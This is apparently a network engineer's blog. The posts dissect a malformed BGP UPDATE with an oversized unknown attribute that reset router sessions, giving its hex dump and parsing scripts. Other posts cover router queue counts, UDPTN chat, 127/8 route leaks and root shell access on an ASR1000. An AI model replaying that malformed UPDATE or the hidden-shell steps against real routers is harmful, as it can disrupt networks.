0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 185D AF90


According to BGP's RFC, the "3/1" in the error message translates to Code "UPDATE Message Error" and Subcode "Malformed Attribute List".

Wireshark offers an "easy" way to decode packets in ASCII format, as long as you feed them in the right way. The following perl script (which is based on my previous ciscodump2text) will convert the BGP packet included in the above Cisco error messages into a format that can be understood by Wireshark's text2pcap.


#!/opt/perl/bin/perl
#
# bgpdump2text v0.1
#
# Convert BGP packets included in Cisco BGP notification error messages
# to a special text format that can then be fed into text2pcap
# so a pcap file for Wireshark can be created at the end.
# You have to remove any extra characters included in the error messages.
#
# Copyright (C) 2010 Tassos (http://ccie-in-3-months.blogspot.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.

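use strict;
use warnings;

my @packets    = ();
my $first_line = 0;

while (<>) {
    my $line = $_;

    # Collect from the line that starts with the 16-byte all-ones BGP marker
    # and keep appending every line after it.
    if ( ( $line =~ /^FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF/ ) || ( $first_line == 1 ) ) {
        $first_line = 1;

        # Strip all whitespace so the packet becomes one continuous hex string.
        $line =~ s/\s//g;
        $packets[1] .= $line;
    }
}

for ( my $i = 1; $i <= @packets; $i++ ) {

    if ( defined $packets[$i] ) {

        # Emit 16 bytes per row, each row prefixed with its 8-digit hex offset.
        for ( my $j = 0; $j < length( $packets[$i] ); $j += 2 ) {
            if ( $j == 0 ) {
                printf "# BGP Packet $i\n%08X", $j / 2;
            } elsif ( $j % 32 == 0 ) {
                printf " #\n%08X", $j / 2;
            }
            print " " . substr( $packets[$i], $j, 2 );
        }

        print " #\n";
    }
}

print "\n";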


By using as input a text file with the BGP packet as shown in the original error message, you'll get an output text file ready to be processed by text2pcap.

The format the source text file (test-bgp.text) should have is the following.


FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF 0118 0200 0000 FD40 0101 0040 0206 0202 0D1C
316E 4003 04C3 10A1 6180 0404 0000 0000 4005 0400 0000 3CC0 081C 0D1C 0002 0D1C 001
6 0D1C 0056 0D1C 01F7 0D1C 029A 0D1C 0813 FDE8 FDDE F063 0BB8 0000 0000 0000 0000 00
00 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0
000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 000
0 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 185D AF90


You just need to erase all extra characters from the original error message and it's ready. The actual data starts after the "Bad attributes" string. Keep in mind that the packet might have been split across more than one message, like in the above case. Just remove the initial characters from every line and it'll be ok.

Script is executed like below:

tassos$ bgpdump2text test-bgp.text > test-bgp.txt


The generated text file (test-bgp.txt) will have the following contents:


# BGP Packet 1
00000000 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF #
00000010 01 18 02 00 00 00 FD 40 01 01 00 40 02 06 02 02 #
00000020 0D 1C 31 6E 40 03 04 C3 10 A1 61 80 04 04 00 00 #
00000030 00 00 40 05 04 00 00 00 3C C0 08 1C 0D 1C 00 02 #
00000040 0D 1C 00 16 0D 1C 00 56 0D 1C 01 F7 0D 1C 02 9A #
00000050 0D 1C 08 13 FD E8 FD DE F0 63 0B B8 00 00 00 00 #
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 #
00000110 00 00 00 00 18 5D AF 90 #


Note : right now, only one packet can be processed.

In our case (BGP data only) we need to add a L2 header, an IP header and a TCP header with values that resemble BGP, so we add the required parameters in the text2pcap program:


C:\Program Files\Wireshark>text2pcap.exe -T 179,1025 -d test-bgp.txt test-bgp.pcap
Input from: test-bgp.txt
Output to: test-bgp.pcap
Generate dummy Ethernet header: Protocol: 0x800
Generate dummy IP header: Protocol: 6
Generate dummy TCP header: Source port: 179. Dest port: 1025
Start new packet
Wrote packet of 280 bytes at 0

-------------------------
Read 1 potential packet, wrote 1 packet


Now, if you load this pcap file into Wireshark, you'll get the following output:



As you can clearly see, there was an unknown attribute (with Type Code 99) inserted into the UPDATE message with the following characteristics:

Flags: Optional, Transitive, Partial, Extended Length
Type code : 99
Length : 3000 bytes

The length of the BGP UPDATE message has been defined as 280 in the BGP header, having 253 as total path attribute length, so something went clearly wrong.

This unknown attribute should have a length of 3000 bytes as defined in its length attribute, but it was only 184 bytes if you count the octets from where zeros start (after 0x0BB8) till the end. From this number comes 188 (184 + 4 for Flags/TypeCode/Length), the number that's included in the initial error message.

So, the length of the unknown attribute has been defined as 3000 in the packet, which is 0x0BB8 in hex. If you somehow remove the first octet, then it becomes 0xB8, which is 184 in decimal. If you add the 4 extra bytes (Flags, Type code, Length), then it becomes 188 and the sum of all attributes becomes 253, which is the one shown in the packet too.

In reverse order, if you calculate the supposed total path attribute length in case all attributes were correct, then it should be 3069, which is 0x0BFD in hex. If again you somehow remove the first octet, it becomes 0xFD (253).

I guess, in general anything larger than 0xFF (255) would have caused the same issue too.
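The length arithmetic above can be reproduced by walking the path attributes of the dumped message and comparing each declared length with the octets actually left in the attribute block. This Python sketch is an added example, not part of the original post; the function names are illustrative and the bytes are taken from the dump shown earlier.

```python
import struct

HEADER_LEN = 19  # 16-octet marker + 2-octet length + 1-octet type
FLAG_NAMES = ((0x80, "Optional"), (0x40, "Transitive"),
              (0x20, "Partial"), (0x10, "Extended Length"))

# The UPDATE from the page's dump: the first 0x5C octets, the 184 zero
# octets that follow them, and the last 4 octets.
UPDATE = bytes.fromhex(
    "FF" * 16 +
    "0118" "02"                # message length 280, type 2 (UPDATE)
    "0000" "00FD"              # withdrawn routes length 0, total attr length 253
    "40010100"                 # type 1
    "40020602020D1C316E"       # type 2
    "400304C310A161"           # type 3
    "80040400000000"           # type 4
    "4005040000003C"           # type 5
    "C0081C" "0D1C0002" "0D1C0016" "0D1C0056" "0D1C01F7"
    "0D1C029A" "0D1C0813" "FDE8FDDE"   # type 8
    "F0630BB8"                 # type 99, extended length 0x0BB8 = 3000
    + "00" * 184 + "185DAF90")


def flag_names(flags):
    return [name for bit, name in FLAG_NAMES if flags & bit]


def walk_attributes(block):
    """Walk the path attributes in `block`, stopping at the first attribute
    whose declared length does not fit in what is left of the block."""
    attrs, off = [], 0
    while off < len(block):
        left = len(block) - off
        ext = bool(block[off] & 0x10)          # Extended Length flag
        hdr = 4 if ext else 3
        if left < hdr:
            attrs.append({"offset": off, "error": "truncated header",
                          "overrun": True})
            break
        declared = (struct.unpack_from("!H", block, off + 2)[0] if ext
                    else block[off + 2])
        attr = {"offset": off, "flags": block[off], "type": block[off + 1],
                "header": hdr, "declared": declared, "available": left - hdr,
                "overrun": declared > left - hdr}
        attrs.append(attr)
        if attr["overrun"]:
            break
        off += hdr + declared
    return attrs


def analyse_update(msg):
    if len(msg) < HEADER_LEN + 4:
        raise ValueError("too short for a BGP UPDATE")
    marker, msg_len, msg_type = struct.unpack_from("!16sHB", msg, 0)
    if marker != b"\xff" * 16 or msg_type != 2 or msg_len != len(msg):
        raise ValueError("not a complete BGP UPDATE message")
    (withdrawn_len,) = struct.unpack_from("!H", msg, HEADER_LEN)
    attr_len_off = HEADER_LEN + 2 + withdrawn_len
    if attr_len_off + 2 > msg_len:
        raise ValueError("Withdrawn Routes Length exceeds the message")
    (total_attr_len,) = struct.unpack_from("!H", msg, attr_len_off)
    start = attr_len_off + 2
    report = {
        "msg_len": msg_len,
        "total_attr_len": total_attr_len,
        # The RFC 4271 check quoted on the page looks at the outer lengths only.
        "outer_lengths_ok": withdrawn_len + total_attr_len + 23 <= msg_len,
        "attrs": walk_attributes(msg[start:start + total_attr_len]),
        "nlri": msg[start + total_attr_len:],
    }
    last = report["attrs"][-1] if report["attrs"] else None
    if last and last["overrun"] and "declared" in last:
        # Lengths as they would be if the attribute were complete, and what
        # remains of them when only the low octet is kept.
        full_total = last["offset"] + last["header"] + last["declared"]
        report["bad_attr"] = last
        report["full_total_attr_len"] = full_total
        report["declared_low_octet"] = last["declared"] & 0xFF
        report["full_total_low_octet"] = full_total & 0xFF
    return report


if __name__ == "__main__":
    r = analyse_update(UPDATE)
    print("message length %d, total attribute length %d, outer check ok: %s"
          % (r["msg_len"], r["total_attr_len"], r["outer_lengths_ok"]))
    for a in r["attrs"]:
        if "error" in a:
            print("  offset %3d: %s" % (a["offset"], a["error"]))
            continue
        print("  offset %3d type %3d declared %4d available %3d %s%s" % (
            a["offset"], a["type"], a["declared"], a["available"],
            "/".join(flag_names(a["flags"])),
            "  <-- overruns the block" if a["overrun"] else ""))
    if "bad_attr" in r:
        print("full total attribute length %d (low octet %d); "
              "declared length low octet %d" % (
                  r["full_total_attr_len"], r["full_total_low_octet"],
                  r["declared_low_octet"]))
```

The outer RFC 4271 length check passes for this message (0 + 253 + 23 is not larger than 280); the inconsistency only shows up when each attribute's own length is checked against the remaining octets.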

Cisco issued an advisory after some hours, providing fixes for its IOS-XR software.


Regarding the behavior of BGP, the relevant RFC (4271) says the following, so everything was expected:

NOTIFICATION messages are sent in response to errors or special conditions. If a connection encounters an error condition, a NOTIFICATION message is sent and the connection is closed.
...
A NOTIFICATION message is sent when an error condition is detected. The BGP connection is closed immediately after it is sent.
...
Error checking of an UPDATE message begins by examining the path attributes. If the Withdrawn Routes Length or Total Attribute Length is too large (i.e., if Withdrawn Routes Length + Total Attribute Length + 23 exceeds the message Length), then the Error Subcode MUST be set to Malformed Attribute List.


There is also a lot of discussion happening regarding the notification and reset thing after this event and draft-ietf-idr-optional-transitive seems quite interesting.

Links
http://mailman.nanog.org/pipermail/nanog/2010-August/024837.html
http://www.networkworld.com/news/2010/082710-research-experiment-disrupts-internet-for.html
http://www.renesys.com/blog/2010/08/house-of-cards.shtml
https://labs.ripe.net/Members/erik/ripe-ncc-and-duke-university-bgp-experiment/

Question
Is there a chance by creating "dummy" and large attributes to cause memory issues on BGP routers?

Sunday, April 18, 2010

How to find queue utilisation on 7600/ES+ cards

Cisco usually provides various technical characteristics about their products, but you never get the details you need. One big mystery is the ES/ES+ cards on the 7600 platform. We've been using the ES+ cards for quite a long time and i was trying to get a comparison with the ES+T ones, which come at lower prices. The most worrying fact (regarding a specific project's needs) was a difference in QoS (especially egress):

76-ES+T-20G : (16, 8, 4) (Level 4 Queues, Level 3 Shaper, Level 2 Shaper) queues per port
7600-ES+20G3CXL : 64,000 ingress queues & 64,000 egress queues

This seems like a big difference, but it may not be relevant to your case, unless you know how to count them easily.

An easy way to start experimenting is the "sh tech-support" command, which includes a lot of information. A variant of this is "sh hw-module slot x tech-support", if you're interested in a specific module. Beware of bug CSCta88917 if you try this. Bug toolkit doesn't say anything useful, but after we opened a new SR, we had to rma the whole module, because according to the tac engineer the crash was due to a faulty sensor (any idea why GOLD didn't catch it?).

Anyway, the command that displays the queue usage is "show platform hardware qos np x queue resources" and this is the output from a 7600-ES+20G3CXL card in slot 9 of a 7600:


7600#rem com mod 9 show platform hardware qos np 0 queue resources

np tm level groups entity
----------------------------------------------
0 0 L4 4096/15 32768/34
0 0 L3 256/13 4096/15
0 0 L2 8/11 256/13
0 0 L1 32/10 32/10
----------------------------------------------
0 1 L4 4096/14 32768/51
0 1 L3 256/10 4096/14
0 1 L2 8/5 256/6
0 1 L1 32/5 32/5
----------------------------------------------
0 2 L4 4096/6 32768/16
0 2 L3 256/6 4096/6
0 2 L2 8/5 256/5
0 2 L1 32/5 32/5

7600#rem com mod 9 show platform hardware qos np 1 queue resources

np tm level groups entity
----------------------------------------------
1 0 L4 4096/15 32768/34
1 0 L3 256/13 4096/15
1 0 L2 8/11 256/13
1 0 L1 32/10 32/10
----------------------------------------------
1 1 L4 4096/5 32768/10
1 1 L3 256/5 4096/5
1 1 L2 8/5 256/5
1 1 L1 32/5 32/5
----------------------------------------------
1 2 L4 4096/5 32768/10
1 2 L3 256/5 4096/5
1 2 L2 8/5 256/5
1 2 L1 32/5 32/5


You can see the queues per NP and per level. 7600-ES+20G3CXL has two NPs, each one controlling 10 ports. Each NP has 3 tm; tm 0 in each NP doesn't seem to be updated by the configuration changes (any clue?). The ones that interest you are tm 1 and tm 2 entity values, which control 5 ports each.

Summing up:

NP 0, tm 1 : ports 1-5
NP 0, tm 2 : ports 6-10
NP 1, tm 1 : ports 11-15
NP 1, tm 2 : ports 16-20

According to the above outputs, there are 32768+32768 entities per NP, so i don't know if the official number of 64000 queues is totally correct. i.e. can you use all of them on the first 5 ports? 7600/ES+ QoS documentation provides some info, but it's not very clear.

These are the values you start with:


level entity
-------------------
L4 32768/10
L3 4096/5
L2 256/5
L1 32/5


If you have a single level policy, then you only reserve queues from L4 level.
If you have a hierarchical policy with 2 levels, then you reserve queues from L4 and L3 levels.
If you have a hierarchical policy with 3 levels, then you reserve queues from L4, L3 and L2 levels.

Service instance, port-channel service instance, and Layer 3 subinterface support 2-level policy-map:
- parent => class-default
--- child => user defined classes

Main interface supports 3-level policy-map:
- grand-parent => class-default
--- parent => user defined classes
----- child => user defined classes


Examples

If you have the following 2-level egress H-QoS applied on a main interface


7600#sh policy-map int gi9/6 | i Class
Class-map: class-default (match-any)
Class-map: 1A-CLASS (match-all)
Class-map: 1B-CLASS (match-all)
Class-map: 1C-CLASS (match-all)
Class-map: 1D-CLASS (match-all)
Class-map: 1E-CLASS (match-all)
Class-map: class-default (match-any)


then the output becomes...

Before:

level entity
-------------------
L4 32768/10
L3 4096/5
L2 256/5
L1 32/5


After:

level entity
-------------------
L4 32768/16
L3 4096/6
L2 256/5
L1 32/5


which means you're using :

1 L3 queue
6 L4 queues


If you have the following 3-level egress H-QoS applied on a main interface


7600#sh policy-map int gi9/1 | i Class
Class-map: class-default (match-any)
Class-map: 1A-CLASS (match-all)
Class-map: 2A-CLASS (match-all)
Class-map: 2B-CLASS (match-all)
Class-map: 2C-CLASS (match-all)
Class-map: 2D-CLASS (match-all)
Class-map: class-default (match-any)
Class-map: 1B-CLASS (match-all)
Class-map: 2A-CLASS (match-all)
Class-map: 2B-CLASS (match-all)
Class-map: 2C-CLASS (match-all)
Class-map: 2D-CLASS (match-all)
Class-map: class-default (match-any)
Class-map: 1C-CLASS (match-all)
Class-map: 2A-CLASS (match-all)
Class-map: 2B-CLASS (match-all)
Class-map: 2C-CLASS (match-all)
Class-map: 2D-CLASS (match-all)
Class-map: class-default (match-any)
Class-map: 1D-CLASS (match-all)
Class-map: class-default (match-any)


then the output becomes...

Before:

level entity
-------------------
L4 32768/10
L3 4096/5
L2 256/5
L1 32/5


After:

level entity
-------------------
L4 32768/27
L3 4096/10
L2 256/6
L1 32/5


which means you're using :

1 L2 queue
5 L3 queues
17 L4 queues


Notes

1) Does anyone have any explanation about the 2 extra L4 queues from the last example? If you count the leaf classes, you'll find they are 15. I guess the last 2 classes (that have no child) reserve an extra "hidden" child queue, probably in order to make their depth equal to the others'.

2) In IOS, hierarchical levels are represented as follows and current support is up to five levels:

• Physical or main interface
• Subinterface or logical layer
• Grandparent class
• Parent class
• Child class

A policy map with 2 levels has :
• 3 levels of hierarchy when attached on the main interface
• 4 levels of hierarchy when attached on a subinterface

A policy map with 3 levels has :
• 4 levels of hierarchy when attached on the main interface
• 5 levels of hierarchy when attached on a subinterface

Saturday, February 13, 2010

Realtime chat between Cisco routers

You probably know that it's possible to send messages from one vty line to another on a single Cisco router.


R1#send ?
* All tty lines
<0-17> Send a message to a specific line
aux Auxiliary line
console Primary terminal line
log Logging destinations
qdm Send a message to QDM client
vty Virtual terminal
xsm Send a message to XSM client



R1#send 1
Enter message, end with CTRL/Z; abort with CTRL/C:
Hi
^Z
Send message? [confirm]

R1#

***
***
*** Message from tty0 to tty1:
***
Hi


For the last few days i've been trying to find a way to automatically send some custom-made UDP packets from a Cisco router to a specific destination, in order to emulate the heartbeat mechanism of SixXS. Tcl seemed like a nice option, but as far as i know its implementation in Cisco IOS doesn't support extensions (Tcl doesn't have a built-in command for UDP channels, so we must use an extension to enable it).

Asynchronous Serial Traffic Over User Datagram Protocol or UDPTN (UDP Telnet) is an IOS feature that provides the ability to encapsulate asynchronous data into UDP packets, and then unreliably transmit this data without needing to establish a connection with a receiving device. UDPTN is similar to Telnet in that both are used to transmit data, but UDPTN is unique in that it does not require that a connection be established with a receiving device.

Its usage is quite simple. You just have to enable udptn as an output transport under your vtys and then open a connection to the remote end.


R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#line vty 0 15
R1(config-line)#transport output ssh udptn
R1(config-line)#^Z
R1#

R2#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R2(config)#line vty 0 15
R2(config-line)#transport output ssh udptn
R2(config-line)#^Z
R2#


You have various options regarding the role of each device, but usually one end is transmitting and the other end is receiving. If you need 2-way communication, then you need to enable both directions. You can use any port above 1024 or just the default 57.


R1#udptn 1.1.1.2 3740 /transmit /receive
Trying 1.1.1.2, 3740 ... Open

R2#udptn 1.1.1.1 3740 /transmit /receive
Trying 1.1.1.1, 3740 ... Open


It becomes more interesting if you send packets to a multicast/broadcast address, so everyone having an open connection there will see the data.

There are some annoying things, like that you can't see locally the entered chars, or that you get chars on top of the previous chars (you can use spaces in order to clear the line), but you can't expect the full thing.


R2#udptn 1.1.1.1 3740 /transmit /receive
Trying 1.1.1.1, 3740 ... Open
How are you doing today? ! This was typed on R1

R1#udptn 1.1.1.2 3740 /transmit /receive
Trying 1.1.1.2, 3740 ... Open
Fine, thanks ! This was typed on R2


Voila! You just made it possible to have a chat with your friend at a remote Cisco router! If you want to stop the session, you can use Ctrl-Shift-6 + x and then enter the "disconnect" command.

There are 2 terminal options that can be configured under source vtys and can change the behavior of text output:

dispatch-timeout 10000 : This one makes the packets be transmitted every 10 secs
dispatch-character 13 : This one causes the current number of typed chars to be sent after you press Enter (ASCII 13). By default each char is sent immediately.

Note : Because of its ability to send raw UDP datagrams that might conflict with other protocols, UDPTN has an implicit access list that only allows UDPTN connections to UDP port 57 (default) or UDP ports greater than 1024.

If only now i could find a way to send such messages automatically, i would probably solve my initial issue. EEM doesn't provide a mechanism to feed chars into a remote session and the Tcl "typeahead/exec" solution makes the process get stuck (and i can't find a way to clear it). Any idea how to send Ctrl-Shift-6 + x?

Monday, February 8, 2010

Should IPC's 127.0.0.0/8 be redistributed by OSPF?

I have had a TAC case open for over 5 months, regarding the default redistribution of 127/8 when "service internal" is configured on a C10000 router. Keep in mind that i'm redistributing all connected routes to OSPF.

Specifically:


C10k-33SB7>sh ip route 127.0.0.0
Routing entry for 127.0.0.0/8, 2 known subnets
Attached (2 connections)
Variably subnetted with 2 masks
Redistributing via ospf x
C 127.0.0.0/8 is directly connected, Ethernet0/0/0
L 127.0.0.254/32 is directly connected, Ethernet0/0/0

C10k-33SB7>sh ip ospf database self-originate | i 127.0.0.0
127.0.0.0 x.x.x.x 1590 0x80001C02 0x00FA81 0


If i understand correctly, 127/8 is used by the IPC (Inter-Process Communication) channel on the C10k. According to Cisco:

"Ethernet 0/0/0 is assigned to the backplane. It is not a user configurable interface. The reason for this is to provide a loopback interface for testing purposes. You cannot configure it or make it go away. There will be no impact on routing since all addresses in the 127/8 are illegal for routing purposes."

Of course, the reason i have to carry all those non-routable prefixes in my OSPF database is of no concern to Cisco.


another-router>sh ip ospf database | i 127.0.0.0
127.0.0.0 x.x.x.x 601 0x80000932 0x00BEC7 0
127.0.0.0 x.x.x.x 347 0x80001C02 0x00FA81 0
127.0.0.0 x.x.x.x 288 0x80000918 0x00FB7B 0
127.0.0.0 x.x.x.x 526 0x800026EE 0x00E9EE 0
127.0.0.0 x.x.x.x 1972 0x80000917 0x00A8DE 0
127.0.0.0 x.x.x.x 110 0x80002563 0x00D622 0
....


Cisco proposes to simply filter them using access-lists/prefix-lists, but i cannot understand why i have to filter something that shouldn't be there in any case. After all, i'm already filtering customer routes where i would expect such routes.

Some months ago, Cisco had issued a security advisory about the IPC being externally reachable. Both bugs (CSCsg15342, CSCsh29217) referenced in that advisory include exactly the same info, but i don't know what was actually fixed.

IPC processing needs to be more robust
Cisco 10000, uBR10012 and uBR7200 series devices use a User Datagram Protocol (UDP) based Inter-Process Communication (IPC) channel that is externally reachable. An attacker could exploit this vulnerability to cause a denial of service (DoS) condition on affected devices. No other platforms are affected.


Probably they fixed the reachable part and messed up the announce part, because in previous IOS there wasn't such an issue :


C10k-31SB14>sh ip route 127.0.0.0
Routing entry for 127.0.0.0/8
Known via "connected", distance 0, metric 0 (connected, via interface)
Redistributing via ospf x
Routing Descriptor Blocks:
* directly connected, via Ethernet0/0/0
Route metric is 0, traffic share count is 1

C10k-31SB14>sh ip ospf database self-originate | i 127.0.0.0
C10k-31SB14>


I have heard tens of excuses about "service internal", but i haven't heard anything that mandates this silly 127/8 redistribution. If anyone knows the actual reason behind this, i would be very glad to hear it.

Monday, February 1, 2010

Get your hands dirty with Linux on an ASR1000

Most of you will know that the ASR1000 runs IOS XE on top of a Linux kernel. Actually, more than one IOS XE package runs on top of more than one Linux kernel (all three control CPUs (RP, FECP, IOCP) run a Linux kernel).

Here is how you can have some fun with it.

WARNING : Everything below this line is being done at your own risk. You probably don't want to experiment on a production network and you'd better use this functionality only under supervision of Cisco Support.

First you have to configure "service internal" in order to enable some advanced -hidden- commands:


ASR1k#conf t
Enter configuration commands, one per line. End with CNTL/Z.
ASR1k(config)#service internal
ASR1k(config)#^Z
ASR1k#


Then you must enable shell access by configuring it globally :


ASR1k#conf t
Enter configuration commands, one per line. End with CNTL/Z.
ASR1k(config)#platform ?
ipsec Platform specific ipsec command
multicast Configure multicast
reload Platform specific reload command
shell Control platform shell access command availability

ASR1k(config)#platform shell
ASR1k(config)#^Z
ASR1k#


And now you're ready to request shell access. You can open a shell to any of the control CPUs (active or standby), but i'll stick to the RP.


ASR1k#request platform software system shell rp act
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y

2010/02/01 10:15:31 : Shell access was granted to user ; Trace file: , /harddisk/tracelogs/system_shell_R0.log.20100201101531
**********************************************************************
Activity within this shell can jeopardize the functioning
of the system.
Use this functionality only under supervision of Cisco Support.

Session will be logged to:
harddisk:tracelogs/system_shell_R0.log.20100201101531
**********************************************************************


Here are some interesting outputs :


[ASR1k_RP_0:/]$ uname -a
Linux ASR1k_RP_0 2.6.18.8 #8 SMP Wed Nov 4 23:10:18 PST 2009 x86_64 x86_64 x86_64 GNU/Linux

[ASR1k_RP_0:/]$ pwd
/
[ASr1k_RP_0:/]$ ls -al
total 56
drwxr-xr-x 19 904735 25 0 Jan 22 12:44 .
drwxr-xr-x 19 904735 25 0 Jan 22 12:44 ..
-rw-r--r-- 1 root root 0 Jan 19 06:58 .autofsck
-rw-r--r-- 1 904735 25 684 Jan 19 06:57 .pkgset
drwxr-xr-x 2 root root 0 Jan 19 06:57 auto
drwxr-xr-x 2 904735 25 0 Jan 19 06:57 bin
drwxr-xr-x 6 root root 4096 Feb 1 10:17 bootflash
-rwxr-xr-x 1 904735 25 43688 Jan 19 06:57 common
lrwxrwxrwx 1 root root 10 Jan 19 06:57 config -> /bootflash
drwxrwxrwt 6 root root 13540 Jan 19 06:58 dev
lrwxrwxrwx 1 root root 10 Jan 19 06:57 disk0 -> /vol/disk0
drwxr-xr-x 15 904735 25 0 Jan 19 06:58 etc
lrwxrwxrwx 1 root root 13 Jan 19 06:57 harddisk -> /misc/scratch
lrwxrwxrwx 1 root root 33 Jan 19 06:57 issu -> /tmp/sw/rp/0/0/rp_base/mount/issu
drwxr-xr-x 3 904735 25 0 Jan 19 06:57 lib
lrwxrwxrwx 1 root root 34 Jan 19 06:57 lib64 -> /tmp/sw/rp/0/0/rp_base/mount/lib64
drwxr-xr-x 2 root root 0 Jan 19 06:57 misc
drwxr-xr-x 3 root root 0 Jan 19 06:57 mnt
lrwxrwxrwx 1 root root 15 Jan 19 06:57 obfl -> /vol/bootflash4
dr-xr-xr-x 147 root root 0 Jan 19 06:57 proc
-rwxr-xr-x 1 904735 25 1077 Jan 19 06:57 rommon_to_env
drwx------ 2 root root 0 Jan 21 21:29 root
drwxr-xr-x 2 904735 25 0 Jan 19 06:57 sbin
drwxr-xr-x 11 root root 0 Jan 19 06:57 sys
-rw-r--r-- 1 root root 0 Jan 22 12:44 test
drwxr-xr-x 2 root root 0 Jan 19 06:58 tftp
drwxrwxrwt 17 root root 540 Feb 1 10:17 tmp
lrwxrwxrwx 1 root root 10 Jan 19 06:57 usb0 -> /misc/usb0
lrwxrwxrwx 1 root root 10 Jan 19 06:57 usb1 -> /misc/usb1
drwxr-xr-x 7 904735 25 0 Jan 19 06:57 usr
drwxr-xr-x 10 root root 0 Jan 19 06:58 var
drwxr-xr-x 3 root root 0 Jan 22 11:39 vol

[ASR1k_RP_0:/]$ set
BASH=/bin/bash
BASH_ARGC=()
BASH_ARGV=()
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="25" [3]="1" [4]="release" [5]="i686-pc-linux-gnu")
BASH_VERSION='3.2.25(1)-release'
BINOS_ACCESS_RUN_MODE=0
BINOS_BASE_DIR=/tmp/rp
BINOS_BAY_LOCAL=0
BINOS_BIN_DIR=/usr/binos/bin/rp
BINOS_BTRACE_FILE_PATH=/tmp/rp/trace
BINOS_BTRACE_LEVEL=err
BINOS_CHASFS_ROOT=/tmp/rp/chasfs
BINOS_CHASSIS_XML=/usr/binos/conf/chassis.xml
BINOS_CMRP_IMAGE_ROOT=/tftp
BINOS_CMRP_TFTP_PORT=69
BINOS_CONF_DIR=/usr/binos/conf
BINOS_DUAL_IOS_CAPABLE=0
BINOS_DUAL_IOS_REQUESTED=0
BINOS_FRU_LOCAL=BINOS_FRU_RP
BINOS_LIPC_PATH=/tmp/rp/lipc
BINOS_NVRAM_DIR=/config
BINOS_RAMFS_DIR=/tmp
BINOS_SLOT_LOCAL=0
BINOS_TDLDB_PATH=/tmp/rp/tdldb
BINOS_USER_NAME=
BINOS_USER_TMPDIR=/tmp/tmppub
BINOS_USER_TTY='vty 0'
BINOS_USER_UI_CLIENT=ios
COLUMNS=84
CPP_BIN_DIR=/usr/cpp/bin/rp
CPP_CONF_DIR=/usr/cpp/conf
CPP_STARTUP_FILE=/tmp/rp/cpp_startup_complete
CPP_STARTUP_WAIT=120
DIRSTACK=()
EUID=0
GROUPS=()
HISTFILE=/root/.bash_history
HISTFILESIZE=500
HISTSIZE=500
HOSTNAME=ASR1k_RP_0
HOSTTYPE=i686
IFS=$' \t\n'
LINES=40
LOGDIR=/tmp/rp
LOGFILE=/tmp/rp/pvp_log
MACHTYPE=i686-pc-linux-gnu
MAILCHECK=60
MQIPC_PREFIX_NAME=
NETIO_NETMAP=/usr/binos/bin/rp/NETMAP
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/tmp/sw/rp/0/0/rp_daemons/mount/bin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/bin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf:/tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/sbin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/bin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/cpp/bin:/usr/bin:/bin:/sbin:/usr/binos/conf:/usr/binos/bin
PIPESTATUS=([0]="127")
PPID=28601
PS1='[\h:\w]$ '
PS2='> '
PS4='+ '
PWD=/
REAL_MGMTE_DEV=eth2
REMOTEHOST=192.168.0.2
ROMMON_BOOT='bootflash:asr1000rp2-advipservicesk9.02.04.02.122-33.XND2.bin,1;bootflash:asr1000rp2-advipservicesk9.02.04.01.122-33.XND1.bin,1;'
ROMMON_BOOTLDR=
ROMMON_BOOT_PARAM='root=/dev/ram rw console=ttyS1,9600 max_loop=64'
ROMMON_BSI=0
ROMMON_CONFIG_FILE=
ROMMON_ISSU_BOOTED_IMAGE=
ROMMON_NT_K=0:0:0:0
ROMMON_PS1='rommon _ _ '
ROMMON_RANDOM_NUM=1737496254
ROMMON_RET_2_RCALTS=1263876910
ROMMON_RET_2_RTS='06:55:10 EET Tue Jan 19 2010'
SHELL=/bin/bash
SHELLOPTS=braceexpand:emacs:hashall:histexpand:history:interactive-comments:monitor
SHLVL=5
SW_FRU_BASE=/tmp/sw/rp/0/0/rp_daemons/mount
TERM=xterm
UID=0
USER=binos
